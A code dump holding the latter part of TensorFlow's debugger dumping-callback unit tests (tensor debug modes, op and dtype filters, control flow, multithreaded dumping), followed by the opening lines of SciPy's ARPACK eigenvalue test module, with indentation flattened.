elif tensor_debug_mode == "CONCISE_HEALTH":
# 1st element: tensor_id.
# 2nd element: element count. Remaining elements: all zero because there
# is no -inf, inf or nan.
self.assertAllClose( # 1st outer placeholder.
placeholder_traces[0].debug_tensor_value,
[placeholder_op_digests[0].output_tensor_ids[0], 1., 0., 0., 0.])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[1].debug_tensor_value,
[placeholder_op_digests[1].output_tensor_ids[0], 1., 0., 0., 0.])
self.assertAllClose( # 1st inner placeholder.
placeholder_traces[2].debug_tensor_value,
[placeholder_op_digests[2].output_tensor_ids[0], 1., 0., 0., 0.])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[3].debug_tensor_value,
[placeholder_op_digests[3].output_tensor_ids[0], 1., 0., 0., 0.])
# 1st AddV2 op.
self.assertAllClose(
non_placeholder_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
# Log op.
self.assertAllClose(
non_placeholder_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
# 2nd AddV2 op.
self.assertAllClose(
non_placeholder_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
# Sin op.
self.assertAllClose(
non_placeholder_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0], 1.0, 0.0, 0.0, 0.0])
elif tensor_debug_mode == "FULL_HEALTH":
# Elements: [
# -1 is the unset tensor_id for eager op execution,
# device ID (set to -1 for now),
# dtype, rank, element_count,
# neg_inf_count, pos_inf_count, nan_count
# neg_finite_count, zero_count, pos_finite_count]
self.assertAllClose( # 1st outer placeholder.
placeholder_traces[0].debug_tensor_value,
[placeholder_op_digests[0].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[1].debug_tensor_value,
[placeholder_op_digests[1].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
self.assertAllClose( # 1st inner placeholder.
placeholder_traces[2].debug_tensor_value,
[placeholder_op_digests[2].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[3].debug_tensor_value,
[placeholder_op_digests[3].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
# 1st AddV2 op.
self.assertAllClose(
non_placeholder_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
# Log op.
self.assertAllClose(
non_placeholder_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
# 2nd AddV2 op.
self.assertAllClose(
non_placeholder_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
# Sin op.
self.assertAllClose(
non_placeholder_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0],
-1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
elif tensor_debug_mode == "SHAPE":
# 1st element: tensor_id.
# 2nd element: dtype (float32).
# 3rd element: rank (scalar).
# 4th element: element count (1).
# Remaining elements: shape padded to fixed length (6).
self.assertAllClose( # 1st outer placeholder.
placeholder_traces[0].debug_tensor_value,
[placeholder_op_digests[0].output_tensor_ids[0],
1, 0, 1, 0, 0, 0, 0, 0, 0])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[1].debug_tensor_value,
[placeholder_op_digests[1].output_tensor_ids[0],
1, 0, 1, 0, 0, 0, 0, 0, 0])
self.assertAllClose( # 1st inner placeholder.
placeholder_traces[2].debug_tensor_value,
[placeholder_op_digests[2].output_tensor_ids[0],
1, 0, 1, 0, 0, 0, 0, 0, 0])
self.assertAllClose( # 2nd outer placeholder.
placeholder_traces[3].debug_tensor_value,
[placeholder_op_digests[3].output_tensor_ids[0],
1, 0, 1, 0, 0, 0, 0, 0, 0])
# 1st AddV2 op.
self.assertAllClose(
non_placeholder_traces[0].debug_tensor_value,
[add_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
# Log op.
self.assertAllClose(
non_placeholder_traces[1].debug_tensor_value,
[log_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
# 2nd AddV2 op.
self.assertAllClose(
non_placeholder_traces[2].debug_tensor_value,
[add_op_digests[1].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
# Sin op.
self.assertAllClose(
non_placeholder_traces[3].debug_tensor_value,
[sin_op_digests[0].output_tensor_ids[0], 1, 0, 1, 0, 0, 0, 0, 0, 0])
else: # FULL_TENSOR.
placeholder_full_tensor_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in placeholder_traces]
self.assertAllClose(placeholder_full_tensor_values[0], x) # Input x.
self.assertAllClose(placeholder_full_tensor_values[1], y) # Input y.
self.assertAllClose(placeholder_full_tensor_values[2], x) # Input x.
self.assertAllClose(placeholder_full_tensor_values[3], y) # Input y.
non_placeholder_full_tensor_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in non_placeholder_traces]
self.assertAllClose(
non_placeholder_full_tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(
non_placeholder_full_tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(
non_placeholder_full_tensor_values[2],
np.log(5.0) + 1.0) # 2nd AddV2 op.
self.assertAllClose(
non_placeholder_full_tensor_values[3],
np.sin(np.log(5.0) + 1.0)) # Sin op.
def testCapturingExecutedGraphIdsOfTwoCompilationsOfSameFunction(self):
"""Test correct executed IDs of two FuncGraphs from the same Py function."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def ceil_times_two(x):
return math_ops.ceil(x) * 2.0
x_float32 = np.array(3.5, dtype=np.float32)
x_float64 = np.array(4.5, dtype=np.float64)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
self.assertAllClose(ceil_times_two(x_float32), 8.0)
self.assertAllClose(ceil_times_two(x_float64), 10.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 4)
for execution in executions:
self.assertStartsWith(execution.op_type, "__inference_ceil_times_two_")
executed_graph_ids = [execution.graph_id for execution in executions]
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertNotEqual(executed_graph_ids[0], executed_graph_ids[1])
self.assertNotEqual(executed_graph_ids[2], executed_graph_ids[3])
for executed_graph_id in executed_graph_ids:
self.assertEqual(
reader.graph_by_id(executed_graph_id).name, "ceil_times_two")
def testCapturingExecutedGraphIdsOfDuplicateFunctionNames(self):
"""Two FuncGraphs compiled from Python functions with identical names."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
class TestClass(object):
@def_function.function
def ceil_times_two(self, x):
return math_ops.ceil(x) * 2.0
# The `ceil_times_two` method of the two objects will be compiled
# into separate FuncGraphs.
test_object_1 = TestClass()
test_object_2 = TestClass()
x = np.array(3.5, dtype=np.float32)
# Four executions, with two different FuncGraphs, which should lead
# to two unique executed graph IDs (see assertion below).
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_1.ceil_times_two(x), 8.0)
self.assertAllClose(test_object_2.ceil_times_two(x), 8.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 4)
for execution in executions:
self.assertStartsWith(execution.op_type, "__inference_ceil_times_two_")
executed_graph_ids = [execution.graph_id for execution in executions]
self.assertEqual(executed_graph_ids[0], executed_graph_ids[2])
self.assertEqual(executed_graph_ids[1], executed_graph_ids[3])
self.assertNotEqual(executed_graph_ids[0], executed_graph_ids[1])
self.assertNotEqual(executed_graph_ids[2], executed_graph_ids[3])
for executed_graph_id in executed_graph_ids:
self.assertEqual(
reader.graph_by_id(executed_graph_id).name, "ceil_times_two")
@parameterized.named_parameters(
("AddV2", "AddV2"),
("Log", "Log"),
("AddV2AndLog", "(AddV2|Log)"),
)
@test_util.run_in_graph_and_eager_modes
def testOpRegex(self, op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
op_regex=op_regex)
@def_function.function
def log_sum(x, y):
return math_ops.log(x + y)
@def_function.function
def sin1p_log_sum(x, y):
return math_ops.sin(1.0 + log_sum(x, y))
x = constant_op.constant(2.0)
y = constant_op.constant(3.0)
self.assertAllClose(
self.evaluate(sin1p_log_sum(x, y)), np.sin(1.0 + np.log(5.0)))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_op_digests = reader.graph_op_digests()
op_types = [digest.op_type for digest in graph_op_digests]
self.assertIn("AddV2", op_types)
self.assertIn("Log", op_types)
self.assertIn("Sin", op_types)
graph_exec_digests = reader.graph_execution_traces(digest=True)
executed_op_types = [digest.op_type for digest in graph_exec_digests]
tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests]
if op_regex == "AddV2":
self.assertEqual(executed_op_types, ["AddV2", "AddV2"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(
tensor_values[1], np.log(5.0) + 1.0) # 2nd AddV2 op.
elif op_regex == "Log":
self.assertEqual(executed_op_types, ["Log"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], np.log(5.0)) # Log op.
else: # "(AddV2|Log)"
self.assertEqual(executed_op_types, ["AddV2", "Log", "AddV2"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], 5.0) # 1st AddV2 op.
self.assertAllClose(tensor_values[1], np.log(5.0)) # Log op.
self.assertAllClose(
tensor_values[2], np.log(5.0) + 1.0) # 2nd AddV2 op.
def testIncorrectTensorDTypeArgFormatLeadsToError(self):
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*\{\}"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes=dict())
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(self.dump_root,
tensor_dtypes="float32")
with self.assertRaisesRegexp(
ValueError,
r".*expected.*list.*tuple.*callable.*but received.*"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_dtypes=dtypes.float32)
with self.assertRaises(TypeError):
dumping_callback.enable_dump_debug_info(self.dump_root, tensor_dtypes=[
lambda dtype: dtype.is_floating, lambda dtype: dtype.is_integer])
@parameterized.named_parameters(
("float", [dtypes.float32], None),
("float_only_sum", ["float32"], "Sum"),
("float_no_sum", (dtypes.float32,), "(?!Sum)"),
("int", [dtypes.int32], None),
("int_via_lambda", lambda dtype: dtype.is_integer, None),
("exclude_Sum", None, "(?!Sum)"),
("All", None, None),
)
@test_util.run_in_graph_and_eager_modes
def testTensorDTypesAndOpRegexFilters(self,
tensor_dtypes,
op_regex):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR",
tensor_dtypes=tensor_dtypes,
op_regex=op_regex)
@def_function.function
def unique_sum(xs):
"""Sum over the unique values, for testing."""
unique_xs, indices = array_ops.unique(xs)
return math_ops.reduce_sum(unique_xs), indices
xs = constant_op.constant([2., 6., 8., 1., 2.], dtype=dtypes.float32)
y, indices = self.evaluate(unique_sum(xs))
self.assertAllClose(y, 17.)
self.assertAllEqual(indices, [0, 1, 2, 3, 0])
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_digests = reader.graph_execution_traces(digest=True)
executed_op_types = [digest.op_type for digest in graph_exec_digests
if digest.op_type not in ("Const", "Placeholder")]
tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests
if digest.op_type not in ("Const", "Placeholder")]
if tensor_dtypes == [dtypes.float32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique", "Sum"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
self.assertAllClose(tensor_values[1], 17.) # Sum.
elif tensor_dtypes == ["float32"] and op_regex == "Sum":
self.assertEqual(executed_op_types, ["Sum"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], 17.) # Sum.
elif tensor_dtypes == (dtypes.float32,) and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
elif tensor_dtypes == [dtypes.int32] and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(
tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif callable(tensor_dtypes) and not op_regex:
self.assertEqual(executed_op_types, ["Unique"])
self.assertLen(tensor_values, 1)
self.assertAllEqual(
tensor_values[0], [0, 1, 2, 3, 0]) # Unique indices.
elif not tensor_dtypes and op_regex == "(?!Sum)":
self.assertEqual(executed_op_types, ["Unique", "Unique"])
self.assertLen(tensor_values, 2)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
self.assertAllEqual(
tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
else: # "All".
self.assertEqual(executed_op_types, ["Unique", "Unique", "Sum"])
self.assertLen(tensor_values, 3)
self.assertAllClose(tensor_values[0], [2, 6, 8, 1]) # Unique values.
self.assertAllEqual(
tensor_values[1], [0, 1, 2, 3, 0]) # Unique indices.
self.assertAllClose(tensor_values[2], 17) # Sum.
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("FullTensor", "FULL_TENSOR"),
)
@test_util.run_in_graph_and_eager_modes
def testFunctionExecutionWithControlFlow(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0
i += 1
return x
x = constant_op.constant(0.5, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 8.0)
writer.FlushNonExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_op_digests = reader.graph_op_digests()
op_types = [digest.op_type for digest in graph_op_digests]
self.assertIn("Less", op_types)
self.assertIn("Mul", op_types)
self.assertIn("AddV2", op_types)
# Before FlushExecutionFiles() is called, the .execution and
# .graph_execution_traces files should be both empty.
self.assertEqual(reader.num_executions(), 0)
self.assertEqual(reader.num_graph_execution_traces(), 0)
# TODO(cais): Backport execution instrumentation to tf.Session.
writer.FlushExecutionFiles()
# After the flushing, the .execution file should hold the appropriate
# contents.
reader.update()
if context.executing_eagerly():
# NOTE(b/142486213): Execution of the TF function happens with
# Session.run() in v1 graph mode, hence it doesn't get logged to the
executions = reader.executions()
self.assertLen(executions, 1)
executed_op_types = [execution.op_type for execution in executions]
self.assertIn("iterative_doubling", executions[0].op_type)
execution = executions[0]
self.assertLen(execution.input_tensor_ids, 2)
self.assertLen(execution.output_tensor_ids, 1)
self.assertEqual(
debug_event_pb2.TensorDebugMode.keys()[execution.tensor_debug_mode],
tensor_debug_mode)
if tensor_debug_mode == "FULL_TENSOR":
tensor_values = reader.execution_to_tensor_values(execution)
self.assertAllClose(tensor_values, [8.0])
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces
if trace.op_type != "Const"]
if tensor_debug_mode != "CURT_HEALTH":
# Less outputs a boolean tensor, which is not tracked under CURT_HEALTH.
# The Less op should have been executed 5 times.
self.assertEqual(executed_op_types.count("Less"), 5)
# The last executed op should be Less.
self.assertEqual(executed_op_types[-1], "Less")
# AddV2 produces an int tensor, which is not tracked under CURT_HEALTH.
# The AddV2 op should have been run, but we refrain from asserting on
# how many times it's executed.
self.assertIn("AddV2", executed_op_types)
for trace in graph_exec_traces:
self.assertEqual(trace.output_slot, 0)
# The Mul op should have been executed 4 times.
self.assertEqual(executed_op_types.count("Mul"), 4)
tensor_values = [reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces]
if tensor_debug_mode == "NO_TENSOR":
# Under the default NO_TENSOR tensor-debug mode, the tensor_proto ought
# to be an empty float32 tensor.
for tensor_value in tensor_values:
self.assertAllEqual(tensor_value, [])
elif tensor_debug_mode == "CURT_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# 1st element: tensor_id; 2nd element: 0 indicating no inf or nan.
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0.0])
elif tensor_debug_mode == "FULL_TENSOR":
less_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Less"]
self.assertAllEqual(less_values, [True, True, True, True, False])
mul_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Mul"]
self.assertAllClose(mul_values, [1.0, 2.0, 4.0, 8.0])
def testCallingEnableTracingTwiceWithTheSameDumpRootIsIdempotent(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
writer = dumping_callback.enable_dump_debug_info(self.dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 2)
for execution in executions:
self.assertGreater(execution.wall_time, 0)
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
_, stack_frames = reader.read_execution_stack_trace(execution)
self._verifyStackFrames(stack_frames)
def testCallingEnableTracingTwiceWithDifferentDumpRootsOverwrites(self):
dumping_callback.enable_dump_debug_info(self.dump_root)
new_dump_root = self.dump_root + "_new_dump_root"
writer = dumping_callback.enable_dump_debug_info(new_dump_root)
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(new_dump_root) as reader:
reader.update()
executions = reader.executions()
self.assertLen(executions, 2)
for execution in executions:
self.assertGreater(execution.wall_time, 0)
self.assertEqual(execution.op_type, "Unique")
self.assertEqual(execution.num_outputs, 2)
_, stack_frames = reader.read_execution_stack_trace(execution)
self._verifyStackFrames(stack_frames)
with debug_events_reader.DebugDataReader(
self.dump_root) as old_dump_root_reader:
old_dump_root_reader.update()
# The old dump root shouldn't have been written to.
self.assertEqual(old_dump_root_reader.num_executions(), 0)
self.assertFalse(old_dump_root_reader.outermost_graphs())
def testCallingEnableRepeatedlyWithDifferentTensorDebugMode(self):
"""Assert calling enable_dump_debug_info() with two tensor-debug modes.
It should lead to overwriting of the previously-configured mode.
"""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def add_1_divide_by_2(x):
return (x + 1.0) / 2.0
self.assertAllClose(add_1_divide_by_2(constant_op.constant(4.0)), 2.5)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
graph_exec_digests = reader.graph_execution_traces(digest=True)
tensor_values = [reader.graph_execution_trace_to_tensor_value(digest)
for digest in graph_exec_digests]
for tensor_value in tensor_values:
# Under NO_TENSOR mode, each tensor is summarized as an empty float32
# array.
self.assertAllEqual(tensor_value, [])
with self.assertRaisesRegexp(
ValueError, r"already.*NO_TENSOR.*FULL_TENSOR.*not be honored"):
dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="FULL_TENSOR")
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("FullTensor", "FULL_TENSOR"),
)
def testDisableTracingWorks(self, tensor_debug_mode):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
dumping_callback.disable_dump_debug_info()
x = constant_op.constant([10.0, 12.0, 10.0])
for _ in range(2):
array_ops.unique(x)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
self.assertEqual(reader.num_executions(), 0)
self.assertEqual(reader.num_graph_execution_traces(), 0)
self.assertFalse(reader.outermost_graphs())
@parameterized.named_parameters(
("NoTensor", "NO_TENSOR"),
("CurtHealth", "CURT_HEALTH"),
("ConciseHealth", "CONCISE_HEALTH"),
("FullHealth", "FULL_HEALTH"),
("Shape", "SHAPE"),
("FullTensor", "FULL_TENSOR"),
)
def testMultiThreadedExecutionWithSameSetting(self, tensor_debug_mode):
"""Dumping from multiple threads using the same setting."""
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode=tensor_debug_mode)
x = variables.Variable(10.0, dtype=dtypes.float32)
y = variables.Variable(3.0, dtype=dtypes.float32)
@def_function.function
def increase_x():
return x.assign_add(y * 2.0)
increase_x()
num_threads = 3
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=increase_x))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# 10 --> 16 --> 22 --> 28 --> 34.
self.assertAllClose(x.read_value(), 34.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
exec_digests = reader.executions(digest=True)
prev_wall_time = 1
for exec_digest in exec_digests:
self.assertGreaterEqual(exec_digest.wall_time, prev_wall_time)
prev_wall_time = exec_digest.wall_time
graph_exec_traces = reader.graph_execution_traces()
executed_op_types = [trace.op_type for trace in graph_exec_traces]
self.assertEqual(executed_op_types.count("Mul"), 1 + num_threads)
self.assertEqual(
executed_op_types.count("ReadVariableOp"), 2 * (1 + num_threads))
for trace in graph_exec_traces:
# These are all single-output tensors.
self.assertEqual(trace.output_slot, 0)
tensor_values = [reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces]
if tensor_debug_mode == "NO_TENSOR":
for tensor_value in tensor_values:
self.assertAllEqual(tensor_value, [])
elif tensor_debug_mode == "CURT_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# 1st element: tensor ID; 2nd element: 0 indicating no inf or nan.
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 0])
elif tensor_debug_mode == "CONCISE_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# 1st element: tensor ID.
# 2nd element: element count. Remaining elements: all zero because there
# is no -inf, inf or nan.
self.assertAllClose(trace.debug_tensor_value, [tensor_id, 1, 0, 0, 0])
elif tensor_debug_mode == "FULL_HEALTH":
for trace in graph_exec_traces:
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
# Elements: [
# -1 is the unset tensor_id for eager op execution,
# device ID (set to -1 for now),
# dtype, rank, element_count,
# neg_inf_count, pos_inf_count, nan_count
# neg_finite_count, zero_count, pos_finite_count]
self.assertAllClose(
trace.debug_tensor_value,
[tensor_id, -1, 1, 0, 1, 0, 0, 0, 0, 0, 1])
elif tensor_debug_mode == "SHAPE":
for trace in graph_exec_traces:
if trace.op_type == "Mul":
tensor_id = reader.graph_execution_trace_to_tensor_id(trace)
mul_value = reader.graph_execution_trace_to_tensor_value(trace)
# 1st element: tensor_id, should be >= 0.
# 2nd element: dtype enum value (float32).
# 3rd element: rank.
# 4th element: element count.
self.assertAllClose(mul_value, [tensor_id, 1, 0, 1, 0, 0, 0, 0, 0, 0])
elif tensor_debug_mode == "FULL_TENSOR":
mul_values = [
reader.graph_execution_trace_to_tensor_value(trace)
for trace in graph_exec_traces if trace.op_type == "Mul"]
self.assertAllClose(mul_values, [6.0, 6.0, 6.0, 6.0])
def testMultiThreadedDumpingWithDifferentSettings(self):
gpu_name = test_util.gpu_device_name()
if gpu_name:
self.skipTest("b/153671240: test is flaky on GPUs")
dump_root_1 = os.path.join(self.dump_root, "dump_root_1")
dump_root_2 = os.path.join(self.dump_root, "dump_root_2")
v1 = variables.Variable(10.0, dtype=dtypes.float32)
v2 = variables.Variable(3.0, dtype=dtypes.float32)
def add_negative_v1_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_1, tensor_debug_mode="FULL_TENSOR")
# Run in a loop to facilitate interleaving between threads.
for _ in range(3):
v1.assign_add(-(v1 ** 2.0))
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
def add_negative_v2_squared_to_itself():
writer = dumping_callback.enable_dump_debug_info(
dump_root_2, tensor_debug_mode="FULL_TENSOR")
v2_squared = v2 ** 2.0
# Since dumping is disabled before the Neg op is called, no tensor data
# should be dumped from the op, but this shouldn't affect the dumping of
# the tensor data from the Neg op in `add_negative_v1_squared_to_itself`.
# Both behavior is checked below.
dumping_callback.disable_dump_debug_info()
negative_v2_squared = -v2_squared
v2.assign_add(negative_v2_squared)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
# v2 is mutated on a sub-thread.
sub_thread = threading.Thread(target=add_negative_v2_squared_to_itself)
sub_thread.start()
add_negative_v1_squared_to_itself() # v1 is mutated on the main thread.
sub_thread.join()
# 10 - 10 * 10 = -90.
# -90 - (-90 * -90) = -8190.
# -8190 - (-8190 * -8190) = -67084290.
self.assertAllClose(v1.read_value(), -67084290.0)
self.assertAllClose(v2.read_value(), -6.0)
with debug_events_reader.DebugDataReader(dump_root_1) as reader:
reader.update()
exec_digests = reader.executions(digest=True)
v1_squared_values = [
reader.execution_to_tensor_values(digest)
for digest in exec_digests if digest.op_type == "Pow"]
negative_v1_squared_values = [
reader.execution_to_tensor_values(digest)
for digest in exec_digests if digest.op_type == "Neg"]
self.assertAllClose(v1_squared_values, [[100.0], [8100.0], [67076100.0]])
self.assertAllClose(
negative_v1_squared_values, [[-100.0], [-8100.0], [-67076100.0]])
with debug_events_reader.DebugDataReader(dump_root_2) as reader:
reader.update()
exec_digests = reader.executions(digest=True)
executed_op_types = [digest.op_type for digest in exec_digests]
self.assertNotIn("Neg", executed_op_types)
v2_squared_values = [
reader.execution_to_tensor_values(digest)
for digest in exec_digests if digest.op_type == "Pow"]
self.assertAllClose(v2_squared_values, [[9.0]])
@test_util.run_in_graph_and_eager_modes
def testNestedContextIsCapturedByGraphOpCreationHistory(self):
writer = dumping_callback.enable_dump_debug_info(
self.dump_root, tensor_debug_mode="NO_TENSOR")
@def_function.function
def iterative_doubling(x, times):
i = constant_op.constant(0, dtype=dtypes.int32)
while i < times:
x = x * 2.0 - 1.0
i += 1
return x
x = constant_op.constant(2.0, dtype=dtypes.float32)
times = constant_op.constant(4, dtype=dtypes.int32)
# 2 * 2 - 1 = 3; 3 * 2 - 1 = 5; 5 * 2 - 1 = 9; 9 * 2 - 1 = 17.
self.assertAllClose(self.evaluate(iterative_doubling(x, times)), 17.0)
writer.FlushNonExecutionFiles()
writer.FlushExecutionFiles()
with debug_events_reader.DebugDataReader(self.dump_root) as reader:
reader.update()
less_op_digest = reader.graph_op_digests(op_type="Less")[-1]
mul_op_digest = reader.graph_op_digests(op_type="Mul")[-1]
sub_op_digest = reader.graph_op_digests(op_type="Sub")[-1]
# The Less op is from the while-loop cond context and hence should have
# a different innermost context ID from the mul and sub ops, which are
# both from the while-loop body context.
self.assertNotEqual(less_op_digest.graph_id, mul_op_digest.graph_id)
self.assertNotEqual(less_op_digest.graph_id, sub_op_digest.graph_id)
# The Mul and Sub ops are from the same innermost context.
self.assertEqual(mul_op_digest.graph_id, sub_op_digest.graph_id)
if __name__ == "__main__":
ops.enable_eager_execution()
googletest.main()
|
test_arpack.py
|
from __future__ import division, print_function, absolute_import
__usage__ = """
To run tests locally:
python tests/test_arpack.py [-l<int>] [-v<int>]
"""
import warnings
import threading
import numpy as np
from numpy.testing import assert_allclose, \
assert_array_almost_equal_nulp, run_module_suite, \
assert_raises, assert_equal, assert_array_equal
from numpy import dot, conj, random
from scipy.linalg import eig, eigh
from scipy.sparse import csc_matrix, csr_matrix, isspmatrix, diags
from scipy.sparse.linalg import LinearOperator, aslinearoperator
from scipy.sparse.linalg.eigen.arpack import eigs, eigsh, svds, \
ArpackNoConvergence, arpack
from scipy.linalg import svd, hilbert
from scipy._lib._gcutils import assert_deallocated
# eigs() and eigsh() are called many times, so apply a filter for the warnings
# they generate here.
_eigs_warn_msg = "Single-precision types in `eigs` and `eighs`"
def setup_module():
warnings.filterwarnings("ignore", message=_eigs_warn_msg)
def teardown_module():
warnings.filterwarnings("default", message=_eigs_warn_msg)
# precision for tests
_ndigits = {'f': 3, 'd': 11, 'F': 3, 'D': 11}
def _get_test_tolerance(type_char, mattype=None):
"""
Return tolerance values suitable for a given test:
Parameters
----------
type_char : {'f', 'd', 'F', 'D'}
Data type in ARPACK eigenvalue problem
